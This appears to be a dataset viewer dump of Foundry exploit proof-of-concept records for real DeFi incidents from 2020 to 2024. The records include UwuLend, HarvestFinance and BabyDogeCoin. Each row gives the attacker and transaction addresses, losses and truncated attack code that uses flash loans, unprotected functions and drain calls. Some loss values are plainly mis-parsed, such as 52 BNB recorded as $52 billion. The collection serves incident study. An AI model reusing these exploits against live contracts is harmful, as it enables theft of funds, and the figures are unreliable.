source_code
stringlengths
878
31.2k
type
stringclasses
1 value
protocol
stringlengths
2
33
date
stringclasses
70 values
file_name
stringlengths
10
41
attack_vector
stringclasses
4 values
content_hash
stringlengths
16
16
collected_at
stringdate
2026-01-07 10:59:16
2026-01-07 10:59:16
_source
stringclasses
1 value
chain
stringclasses
8 values
block_number
int64
1.11M
356M
total_lost_raw
stringlengths
3
127
total_lost_usd
float64
0
19,026B
attacker_address
stringlengths
65
82
attack_contract
stringlengths
70
89
vulnerable_contract
stringlengths
68
82
attack_tx
stringlengths
89
115
postmortem_url
stringclasses
85 values
twitter_url
stringlengths
48
62
has_keyinfo
bool
2 classes
has_analysis
bool
2 classes
has_attack_vector
bool
2 classes
severity
stringclasses
4 values
severity_raw
stringlengths
3
127
category
stringclasses
5 values
exploit_code
stringlengths
0
25.5k
has_exploit_code
bool
2 classes
keyinfo_total_lost
stringlengths
0
127
keyinfo_attacker
stringlengths
0
82
keyinfo_attack_contract
stringlengths
0
89
keyinfo_vulnerable_contract
stringlengths
0
82
keyinfo_attack_tx
stringlengths
0
115
analysis_postmortem
stringclasses
82 values
analysis_twitter
stringlengths
0
62
funds_lost_formatted
stringlengths
2
13
content_richness_score
float64
0.63
10
quality_estimate
stringclasses
3 values
title
stringlengths
20
51
has_total_lost
bool
2 classes
has_vulnerable_contract
bool
2 classes
has_attack_tx
bool
2 classes
has_postmortem
bool
2 classes
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$19.3M // TX : https://app.blocksec.com/explorer/tx/eth/0x242a0fb4fde9de0dc2fd42e8db743cbc197ffa2bf6a036ba0bba303df296408b // Attacker : https://etherscan.io/address/0x...
exploit_poc
UwuLend_First
2024-06
UwuLend_First_exp.sol
flash_loan
ac53d8f1b74b02b2
2026-01-07T10:59:16.521268
postmortems
ethereum
20,061,318
~$19.3M
19,300,000
https://etherscan.io/address/0x841ddf093f5188989fa1524e7b893de64b421f47
https://etherscan.io/address/0xf19d66e82ffe8e203b30df9e81359f8a201517ad
https://etherscan.io/address/0x2409af0251dcb89ee3dee572629291f9b087c668
null
null
null
true
false
true
critical
~$19.3M
flash-loan
function testExploit() public { toBeLiquidatedHelper = new ToBeLiquidatedHelper(); vm.label(address(toBeLiquidatedHelper), "toBeLiquidatedHelper"); borrowHelper = new BorrowHelper(); vm.label(address(borrowHelper), "borrowHelper"); // 1. approve all console.log("1. appro...
true
~$19.3M
https://etherscan.io/address/0x841ddf093f5188989fa1524e7b893de64b421f47
https://etherscan.io/address/0xf19d66e82ffe8e203b30df9e81359f8a201517ad
https://etherscan.io/address/0x2409af0251dcb89ee3dee572629291f9b087c668
$19.30M
9
high
UwuLend_First Exploit (2024-06)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~52 BNB // TX : https://app.blocksec.com/explorer/tx/bsc/0xbac614f4d103939a9611ca35f4ec9451e1e98512d573c822fbff70fafdbbb5a0 // Attacker : https://bscscan.com/address/0x...
exploit_poc
Dyson_money
2024-06
Dyson_money_exp.sol
null
431b0c2abeed79c8
2026-01-07T10:59:16.521419
postmortems
bsc
39,684,702
~52 BNB
52,000,000,000
https://bscscan.com/address/0x4ced363484dfebd0fab1b33c3eca0edca44a346c
https://bscscan.com/address/0x00db72390c1843de815ef635ee58ac19b54af4ef
null
null
null
null
true
false
false
critical
~52 BNB
unknown
function testExploit() public { USDT.approve(address(Router), type(uint256).max); attack(); emit log_named_decimal_uint("[End] Attacker USDT balance after exploit", USDT.balanceOf(address(this)), 18); emit log_named_decimal_uint("[End] Attacker USDC balance after exploit", USDC.balanceOf...
true
https://bscscan.com/address/0x4ced363484dfebd0fab1b33c3eca0edca44a346c
https://bscscan.com/address/0x00db72390c1843de815ef635ee58ac19b54af4ef
$52000.00M
6.12
medium
Dyson_money Exploit (2024-06)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : $28K // Attack Tx : https://app.blocksec.com/explorer/tx/bsc/0x397a09af6494c0bfcd89e010f5dd65d90f3ee1cf1ff813ce5b0c1d42a1c8dec9?line=84 // Attacker Address : https://bs...
exploit_poc
YYS
2024-06
YYS_exp.sol
null
7f91965c78d77d7c
2026-01-07T10:59:16.521484
postmortems
bsc
39,436,701
$28K
28,000
null
null
null
https://app.blocksec.com/explorer/tx/bsc/0x397a09af6494c0bfcd89e010f5dd65d90f3ee1cf1ff813ce5b0c1d42a1c8dec9?line=84
null
null
true
false
false
medium
$28K
unknown
function testExploit() public { BUSDT.approve(address(invest), type(uint256).max); // Step1: invest,Any address that has been bound before can be used. address(invest).call(abi.encodeWithSelector(bytes4(0xb9b8c246), address(Anotheraddress), 100 ether)); // Step2: Start the attack. ...
true
$28K
https://app.blocksec.com/explorer/tx/bsc/0x397a09af6494c0bfcd89e010f5dd65d90f3ee1cf1ff813ce5b0c1d42a1c8dec9?line=84
$28.0K
6.55
medium
YYS Exploit (2024-06)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$3.7M // TX : https://app.blocksec.com/explorer/tx/eth/0x9235e0662e230bdfa94f56f4932fd09a95fea17e4b9b44a4f40a59449e216110 // Attacker : https://etherscan.io/address/0x8...
exploit_poc
UwuLend_Second
2024-06
UwuLend_Second_exp.sol
flash_loan
bf906993bef3498d
2026-01-07T10:59:16.521536
postmortems
ethereum
20,081,503
~$3.7M
3,700,000
https://etherscan.io/address/0x841ddf093f5188989fa1524e7b893de64b421f47
https://etherscan.io/address/0x0935c185494cc9abee8890d01e67ddcc00b66f8c
https://etherscan.io/address/0x2409af0251dcb89ee3dee572629291f9b087c668
null
null
null
true
false
true
critical
~$3.7M
flash-loan
function testExploit() public { vm.startPrank(attacker); uSUSDE.transfer(address(this), 60_000_000 ether); vm.stopPrank(); ( uint256 totalCollateral, uint256 totalDebt, uint256 availableBorrows, uint256 currentLiquidationThreshold, ...
true
~$3.7M
https://etherscan.io/address/0x841ddf093f5188989fa1524e7b893de64b421f47
https://etherscan.io/address/0x0935c185494cc9abee8890d01e67ddcc00b66f8c
https://etherscan.io/address/0x2409af0251dcb89ee3dee572629291f9b087c668
$3.70M
9
high
UwuLend_Second Exploit (2024-06)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); // CONTRACTS // Uniswap ETH/USDC LP (UNI-V2) IUniswapV2Pair usdcPair = IUn...
exploit_poc
HarvestFinance
2020-10
HarvestFinance_exp.sol
flash_loan
9a090685437a2537
2026-01-07T10:59:16.521591
postmortems
unknown
11,129,473
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { usdt.approve(address(curveYSwap), type(uint256).max); usdc.approve(address(curveYSwap), type(uint256).max); usdc.approve(address(harvest), type(uint256).max); usdt.approve(address(usdtPair), type(uint256).max); usdc.approve(address(usdcPair), type(...
true
Unknown
4.98
low
HarvestFinance Exploit (2020-10)
false
false
false
false
// SPDX-License-Identifier: MIT pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1653149493133729794 // https://twitter.com/BlockSecTeam/status/1653267431127920641 // @TX // https://bscscan.com/tx/0x6aef8bb501a53e290837d4398b34d5d...
exploit_poc
Level
2023-05
Level_exp.sol
flash_loan
ebd077ed948a3671
2026-01-07T10:59:16.521643
postmortems
bsc
27,830,139
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
4
low
Level Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~2.3 ETH // Attacker : https://etherscan.io/address/0x4e998316ec31d2f3078f8f57b952bfae54728be1 // Attack Contract : https://etherscan.io/address/0x6943e74d1109a728f25a2...
exploit_poc
HODLCapital
2023-05
HODLCapital_exp.sol
flash_loan
10d1d919e8e1dcc4
2026-01-07T10:59:16.521707
postmortems
ethereum
null
~2.3 ETH
2.3
https://etherscan.io/address/0x4e998316ec31d2f3078f8f57b952bfae54728be1
https://etherscan.io/address/0x6943e74d1109a728f25a2e634ba3d74e9e476aed
null
null
null
null
true
true
true
low
~2.3 ETH
flash-loan
function testExploit() public { cheats.rollFork(17_220_892); emit log_named_decimal_uint("Attacker ETH balance before exploit", weth.balanceOf(address(this)), 18); // console.log("excludedFromFee:", hodl.isExcludedFromFee(excludedFromFeeAddress)); // console.log("excluded:", hodl.isExclu...
true
https://etherscan.io/address/0x4e998316ec31d2f3078f8f57b952bfae54728be1
https://etherscan.io/address/0x6943e74d1109a728f25a2e634ba3d74e9e476aed
$2
8
high
HODLCapital Exploit (2023-05)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/Phalcon_xyz/status/1661424685320634368 // @TX // https://explorer.phalcon.xyz/tx/bsc/0xb77cb34cd01204bdad930d8c172af12462eef58dea16199185b77147d6533391 // @Summ...
exploit_poc
GPT
2023-05
GPT_exp.sol
flash_loan
3113b400e9c046aa
2026-01-07T10:59:16.521774
postmortems
unknown
28,494,868
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
2.61
low
GPT Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~36K USD$ // Attacker : https://polygonscan.com/address/0x11576cb3d8d6328cf319e85b10e09a228e84a8de // Attack Contract : https://polygonscan.com/address/0x43623b96936e854...
exploit_poc
LFI
2023-05
LFI_exp.sol
null
b8af0f0eb6022a94
2026-01-07T10:59:16.521823
postmortems
polygon
43,025,776
~36K USD$
36,000
https://polygonscan.com/address/0x11576cb3d8d6328cf319e85b10e09a228e84a8de
https://polygonscan.com/address/0x43623b96936e854f8d85f893011f22ac91e58164
https://polygonscan.com/address/0xfc604b6fd73a1bc60d31be111f798dd0d4137812
https://polygonscan.com/tx/0xdd82fde0cc2fb7bdc078aead655f6d5e75a267a47c33fa92b658e3573b93ef0c
null
https://twitter.com/AnciliaInc/status/1660767088699666433
true
true
false
medium
~36K USD$
unknown
false
~36K USD$
https://polygonscan.com/address/0x11576cb3d8d6328cf319e85b10e09a228e84a8de
https://polygonscan.com/address/0x43623b96936e854f8d85f893011f22ac91e58164
https://polygonscan.com/address/0xfc604b6fd73a1bc60d31be111f798dd0d4137812
https://polygonscan.com/tx/0xdd82fde0cc2fb7bdc078aead655f6d5e75a267a47c33fa92b658e3573b93ef0c
https://twitter.com/AnciliaInc/status/1660767088699666433
$36.0K
5.41
medium
LFI Exploit (2023-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~95K US$ // Attacker : https://bscscan.com/address/0xc67af66b8a72d33dedd8179e1360631cf5169160 // Attack Contract : https://bscscan.com/address/0xf635fea87f0a8a444ede1dbb...
exploit_poc
SELLC
2023-05
SELLC_exp.sol
null
ac97f71aab53cef9
2026-01-07T10:59:16.521889
postmortems
bsc
28,092,673
~95K US$
95,000
https://bscscan.com/address/0xc67af66b8a72d33dedd8179e1360631cf5169160
https://bscscan.com/address/0xf635fea87f0a8a444ede1dbb698d875dbb417829
https://bscscan.com/address/0x274b3e185c9c8f4ddef79cb9a8dc0d94f73a7675
https://bscscan.com/tx/0x59ed06fd0d44aec351bed54f57eccec65874da5a25a0aa71e348611710ec05f3
null
https://twitter.com/AnciliaInc/status/1656337400329834496
true
true
false
medium
~95K US$
unknown
function testExploit() public { deal(address(WBNB), address(this), 3 * 1e18); deal(address(QIQI), address(this), 3188 * 1e18); init(); init2(); process(23); emit log_named_decimal_uint( "Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), WBN...
true
~95K US$
https://bscscan.com/address/0xc67af66b8a72d33dedd8179e1360631cf5169160
https://bscscan.com/address/0xf635fea87f0a8a444ede1dbb698d875dbb417829
https://bscscan.com/address/0x274b3e185c9c8f4ddef79cb9a8dc0d94f73a7675
https://bscscan.com/tx/0x59ed06fd0d44aec351bed54f57eccec65874da5a25a0aa71e348611710ec05f3
https://twitter.com/AnciliaInc/status/1656337400329834496
$95.0K
9
high
SELLC Exploit (2023-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~600 USD$ // Vulnerable contract address: https://bscscan.com/address/0xf3f1abae8bfeca054b330c379794a7bf84988228 // @Info // Vulnerable contract code: https://bscscan.c...
exploit_poc
FAPEN
2023-05
FAPEN_exp.sol
null
d58c00b08523240c
2026-01-07T10:59:16.521958
postmortems
bsc
28,637,846
~600 USD$
600
null
null
null
null
null
null
true
true
false
low
~600 USD$
unknown
function testUnstake() public { deal(address(this), 0); emit log_named_decimal_uint("Amount of BNB before attack", address(this).balance, 18); // Vulnerability lies in unstake function. Bad logic in balance check FAPEN.unstake(FAPEN.balanceOf(address(FAPEN))); FAPEN.approve(addre...
true
~600 USD$
$600
4.97
low
FAPEN Exploit (2023-05)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @TX's: // 1. https://bscscan.com/tx/0x57b589f631f8ff20e2a89a649c4ec2e35be72eaecf155fdfde981c0fec2be5ba // 2. https://bscscan.com/tx/0xbea605b238c85aabe5edc636219155d8c4879d6b05c48091cf1f7286bd4...
exploit_poc
LocalTrader2
2023-05
LocalTrader2_exp.sol
access_control
e488b4a67434ff4c
2026-01-07T10:59:16.522005
postmortems
bsc
28,460,897
null
null
null
null
null
null
null
null
false
true
true
medium
null
access-control
function testAccess() public { // 1.Changing owner address in vulnerable contract emit log_named_decimal_uint( "[1] Attacker amount of WBNB before attack", WBNB.balanceOf(address(this)), WBNB.decimals() ); address addrInSlot0Before = getValFromSlot0(); emit log_named...
true
Unknown
5.25
medium
LocalTrader2 Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: MIT pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1654667621139349505 // @TX // https://bscscan.com/tx/0x3f1973fe56de5ecd59a815d3b14741cf48385903b0ccfe248f7f10c2765061f7 // @Summary // critical funct...
exploit_poc
Melo
2023-05
Melo_exp.sol
access_control
d3d8ee6ed1984e9f
2026-01-07T10:59:16.522056
postmortems
bsc
27,960,445
null
null
null
null
null
null
null
null
false
true
true
medium
null
access-control
false
Unknown
1.8
low
Melo Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~30K US$ // Attacker : https://bscscan.com/address/0x878a36edfb757e8640ff78b612f839b63adc2e51 // Attack Contract : https://bscscan.com/address/0x7b9265c6aa4b026b7220eee2...
exploit_poc
Bitpaidio
2023-05
Bitpaidio_exp.sol
null
0fc3b47564f2a960
2026-01-07T10:59:16.522094
postmortems
bsc
28,176,675
~30K US$
30,000
https://bscscan.com/address/0x878a36edfb757e8640ff78b612f839b63adc2e51
https://bscscan.com/address/0x7b9265c6aa4b026b7220eee2e8697bf5ffa6bb9a
https://bscscan.com/address/0x9d6d817ea5d4a69ff4c4509bea8f9b2534cec108
https://bscscan.com/tx/0x1ae499ccf292a2ee5e550702b81a4a7f65cd03af2c604e2d401d52786f459ba6
null
https://twitter.com/BlockSecTeam/status/1657411284076478465
true
true
false
medium
~30K US$
unknown
function testExploit() public { firstLock(); cheats.warp(block.timestamp + 6 * 30 * 24 * 60 * 60 + 1000); // lock 6 month Pair.swap(flashAmount, 0, address(this), new bytes(1)); emit log_named_decimal_uint("Attacker BTP balance after exploit", BTP.balanceOf(address(this)), BTP.decimal...
true
~30K US$
https://bscscan.com/address/0x878a36edfb757e8640ff78b612f839b63adc2e51
https://bscscan.com/address/0x7b9265c6aa4b026b7220eee2e8697bf5ffa6bb9a
https://bscscan.com/address/0x9d6d817ea5d4a69ff4c4509bea8f9b2534cec108
https://bscscan.com/tx/0x1ae499ccf292a2ee5e550702b81a4a7f65cd03af2c604e2d401d52786f459ba6
https://twitter.com/BlockSecTeam/status/1657411284076478465
$30.0K
7.06
medium
Bitpaidio Exploit (2023-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : unclear US$ // Attacker : https://bscscan.com/address/0xa3aa817587556c023e78b2285d381c68cee17069 // Attack Contract : https://bscscan.com/address/0x9a366027e6be5ae8441c9...
exploit_poc
SELLC02
2023-05
SELLC02_exp.sol
null
fdf5ed37e8b3a877
2026-01-07T10:59:16.522152
postmortems
bsc
28,187,317
unclear US$
null
https://bscscan.com/address/0xa3aa817587556c023e78b2285d381c68cee17069
https://bscscan.com/address/0x9a366027e6be5ae8441c9f54455e1d6c41f12e3c
https://bscscan.com/address/0xeaf83465025b4bf9020fdf9ea5fb6e71dc8a0779
https://bscscan.com/tx/0xfe80df5d689137810df01e83b4bb51409f13c865e37b23059ecc6b3d32347136
null
https://twitter.com/BlockSecTeam/status/1657715018908180480
true
true
false
medium
unclear US$
unknown
function testExploit() public { deal(address(USDT), address(this), 1000 * 1e18); stakeFactory(10); cheats.warp(block.timestamp + 60 * 60); TokenA = new TOKENA(); TokenA.mint(100); Pair.flash(address(this), 10_000 * 1e18, 0, new bytes(1)); emit log_named_decimal...
true
unclear US$
https://bscscan.com/address/0xa3aa817587556c023e78b2285d381c68cee17069
https://bscscan.com/address/0x9a366027e6be5ae8441c9f54455e1d6c41f12e3c
https://bscscan.com/address/0xeaf83465025b4bf9020fdf9ea5fb6e71dc8a0779
https://bscscan.com/tx/0xfe80df5d689137810df01e83b4bb51409f13c865e37b23059ecc6b3d32347136
https://twitter.com/BlockSecTeam/status/1657715018908180480
Unknown
8
high
SELLC02 Exploit (2023-05)
false
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~10 ETH // Attacker : https://etherscan.io/address/0x8a4571c3a618e00d04287ca6385b6b020ce7a305 // Attack Contract : https://etherscan.io/address/0x52d74eb7c01c763219dce7...
exploit_poc
MultiChainCapital
2023-05
MultiChainCapital_exp.sol
flash_loan
04a83bb5a888c596
2026-01-07T10:59:16.522212
postmortems
ethereum
null
~10 ETH
10
https://etherscan.io/address/0x8a4571c3a618e00d04287ca6385b6b020ce7a305
https://etherscan.io/address/0x52d74eb7c01c763219dce713da97ebae8b91728e
null
null
null
null
true
true
true
low
~10 ETH
flash-loan
function testExploit() public { cheats.rollFork(17_221_445); // emit log_named_decimal_uint("allowance", mcc.allowance(address(0x52d74eb7C01C763219DCE713dA97EBAE8B91728E), address(0x52d74eb7C01C763219DCE713dA97EBAE8B91728E)), mcc.decimals()); emit log_named_decimal_uint("Attacker ETH balance bef...
true
https://etherscan.io/address/0x8a4571c3a618e00d04287ca6385b6b020ce7a305
https://etherscan.io/address/0x52d74eb7c01c763219dce713da97ebae8b91728e
$10
8
high
MultiChainCapital Exploit (2023-05)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~2K USD$ // Vulnerable Contract : https://etherscan.io/address/0x6feac5f3792065b21f85bc118d891b33e0673bd8 // @Info // Vulnerable Contract Code : https://etherscan.io/ad...
exploit_poc
NOON
2023-05
NOON_exp.sol
null
8384097df04871a8
2026-01-07T10:59:16.522282
postmortems
ethereum
17,366,979
~2K USD$
2,000
null
null
https://etherscan.io/address/0x6feac5f3792065b21f85bc118d891b33e0673bd8
null
null
null
true
true
false
low
~2K USD$
unknown
function testTransfer() public { emit log_named_decimal_uint( "Attacker amount of WETH before exploitation of vulnerability", WETH.balanceOf(address(this)), WETH.decimals() ); // Vulnerable point. Looks like this function has wrong visibility. This shouldn't b...
true
~2K USD$
https://etherscan.io/address/0x6feac5f3792065b21f85bc118d891b33e0673bd8
$2.0K
6.36
medium
NOON Exploit (2023-05)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1661098394130198528 // https://twitter.com/numencyber/status/1661207123102167041 // @TX // https://explorer.phalcon.xyz/tx/bsc/0x906394b2ee0...
exploit_poc
CS
2023-05
CS_exp.sol
null
d8a40ab393db2af8
2026-01-07T10:59:16.522328
postmortems
unknown
28,466,976
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
1.28
low
CS Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~50K US$ // Attacker : https://bscscan.com/address/0x4404de29913e0fd055190e680771a016777973e5 // Attack Contract : https://bscscan.com/address/0xa4fbc2c95ac4240277313bf3...
exploit_poc
LW
2023-05
LW_exp.sol
null
e33a01c81a251c64
2026-01-07T10:59:16.522374
postmortems
bsc
28,133,285
~50K US$
50,000
https://bscscan.com/address/0x4404de29913e0fd055190e680771a016777973e5
https://bscscan.com/address/0xa4fbc2c95ac4240277313bf3f810c54309dfcd6c
https://bscscan.com/address/0x7b8c378df8650373d82ceb1085a18fe34031784f
https://bscscan.com/tx/0xb846f3aeb9b3027fe138b23bbf41901c155bd6d4b24f08d6b83bd37a975e4e4a
null
https://twitter.com/PeckShieldAlert/status/1656850634312925184
true
true
false
medium
~50K US$
unknown
function testExploit() public { Pair.swap(1_000_000 * 1e18, 0, address(this), new bytes(1)); emit log_named_decimal_uint( "Attacker USDT balance after exploit", USDT.balanceOf(address(this)), USDT.decimals() ); }
true
~50K US$
https://bscscan.com/address/0x4404de29913e0fd055190e680771a016777973e5
https://bscscan.com/address/0xa4fbc2c95ac4240277313bf3f810c54309dfcd6c
https://bscscan.com/address/0x7b8c378df8650373d82ceb1085a18fe34031784f
https://bscscan.com/tx/0xb846f3aeb9b3027fe138b23bbf41901c155bd6d4b24f08d6b83bd37a975e4e4a
https://twitter.com/PeckShieldAlert/status/1656850634312925184
$50.0K
7.82
medium
LW Exploit (2023-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1657324561577435136 // @TX // https://explorer.phalcon.xyz/tx/bsc/0x7d04e953dad4c880ad72b655a9f56bc5638bf4908213ee9e74360e56fa8d7c6a // @Sum...
exploit_poc
SellToken
2023-05
SellToken_exp.sol
flash_loan
1e9b4f0bb03280c0
2026-01-07T10:59:16.522419
postmortems
unknown
28,168,034
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
3.28
low
SellToken Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: MIT pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* @Analysis https://twitter.com/BeosinAlert/status/1653619782317662211 @TX https://bscscan.com/tx/0xccf513fa8a8ed762487a0dcfa54aa65c74285de1bc517bd68dbafa2813e4b7cb*/ interface INeverFall { functio...
exploit_poc
NeverFall
2023-05
NeverFall_exp.sol
flash_loan
333661ea0e2825e2
2026-01-07T10:59:16.522465
postmortems
bsc
27,863,178
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { uint256 flashLoanAmount = 1_600_000 * 1e18; IUniswapV2Pair(busd_usdt_pool).swap(flashLoanAmount, 0, address(this), new bytes(1)); }
true
Unknown
4.17
low
NeverFall Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/numencyber/status/1661213691893944320 // @TX // https://explorer.phalcon.xyz/tx/bsc/0x57b589f631f8ff20e2a89a649c4ec2e35be72eaecf155fdfde981c0fec2be5ba // https:...
exploit_poc
LocalTrader
2023-05
LocalTrader_exp.sol
access_control
0dd482f0ce935a37
2026-01-07T10:59:16.522510
postmortems
unknown
28,460,897
null
null
null
null
null
null
null
null
false
true
true
medium
null
access-control
false
Unknown
2.6
low
LocalTrader Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/Phalcon_xyz/status/1656176776425644032 // @TX // https://explorer.phalcon.xyz/tx/bsc/0xace112925935335d0d7460a2470a612494f910467e263c7ff477221deee90a2c // https...
exploit_poc
SNK
2023-05
SNK_exp.sol
null
a0b7a8bb7236ae2a
2026-01-07T10:59:16.522574
postmortems
unknown
27,784,455
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
3
low
SNK Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/cryptofishx/status/1662888991446941697 // https://docs.jimbosprotocol.xyz/protocol/liquidity-rebalancing-scenarios // https://twitter.com/yicunhui2/status/16637...
exploit_poc
Jimbo
2023-05
Jimbo_exp.sol
flash_loan
f5f8a39f08adf8bc
2026-01-07T10:59:16.522641
postmortems
arbitrum
95,144,404
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
4
low
Jimbo Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 200 land NFT => 28,601 $XQJ => 149,616 $BUSD // Attack Tx : https://bscscan.com/tx/0xe4db1550e3aa78a05e93bfd8fbe21b6eba5cce50dc06688949ab479ebed18048 // @Analysis // ht...
exploit_poc
landNFT
2023-05
landNFT_exp.sol
null
e49f13074a87a050
2026-01-07T10:59:16.522718
postmortems
bsc
28,208,132
200 land NFT => 28,601 $XQJ => 149,616 $BUSD
200
null
null
null
https://bscscan.com/tx/0xe4db1550e3aa78a05e93bfd8fbe21b6eba5cce50dc06688949ab479ebed18048
null
null
true
true
false
low
200 land NFT => 28,601 $XQJ => 149,616 $BUSD
unknown
function testExploit() public { emit log_named_uint("Attacker amount of NFT land before mint", landNFT.balanceOf(address(this))); address[] memory to = new address[](1); to[0] = address(this); uint256[] memory amount = new uint256[](1); amount[0] = 200; minerContract.min...
true
200 land NFT => 28,601 $XQJ => 149,616 $BUSD
https://bscscan.com/tx/0xe4db1550e3aa78a05e93bfd8fbe21b6eba5cce50dc06688949ab479ebed18048
$200
5.86
medium
landNFT Exploit (2023-05)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/eugenioclrc/status/1654576296507088906 // @TX // https://arbiscan.io/tx/0xb1141785b7b94eb37c39c37f0272744c6e79ca1517529fec3f4af59d4c3c37ef interface IStablePai...
exploit_poc
DEI
2023-05
DEI_exp.sol
null
458b14aee28bc5e5
2026-01-07T10:59:16.522758
postmortems
arbitrum
87,626,024
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { console.log("DEI balance: ", DEI.balanceOf(address(this))); DEI.approve(address(pair), type(uint256).max); DEI.burnFrom(address(pair), 0); DEI.transferFrom(address(pair), address(this), DEI.balanceOf(address(pair)) - 1); console.log("DEI balance f...
true
Unknown
2.81
low
DEI Exploit (2023-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~7.5M USD$ // Attacker : https://bscscan.com/address/0xcbc0d0c1049eb011d7c7cfc4ff556d281f0afebb // Attack Contract : https://bscscan.com/address/0x51873a0b615a51115f2cfb...
exploit_poc
BabyDogeCoin
2023-05
BabyDogeCoin_exp.sol
flash_loan
ffc98cc92e120cf9
2026-01-07T10:59:16.522796
postmortems
bsc
28,593,354
~7.5M USD$
7,500,000
https://bscscan.com/address/0xcbc0d0c1049eb011d7c7cfc4ff556d281f0afebb
https://bscscan.com/address/0x51873a0b615a51115f2cfbc2e24d9db4bfa2e6e2
https://bscscan.com/address/0xc748673057861a797275cd8a068abb95a902e8de
https://bscscan.com/tx/0x098e7394a1733320e0887f0de22b18f5c71ee18d48a0f6d30c76890fb5c85375
null
https://twitter.com/Phalcon_xyz/status/1662744426475831298
true
true
true
critical
~7.5M USD$
flash-loan
false
~7.5M USD$
https://bscscan.com/address/0xcbc0d0c1049eb011d7c7cfc4ff556d281f0afebb
https://bscscan.com/address/0x51873a0b615a51115f2cfbc2e24d9db4bfa2e6e2
https://bscscan.com/address/0xc748673057861a797275cd8a068abb95a902e8de
https://bscscan.com/tx/0x098e7394a1733320e0887f0de22b18f5c71ee18d48a0f6d30c76890fb5c85375
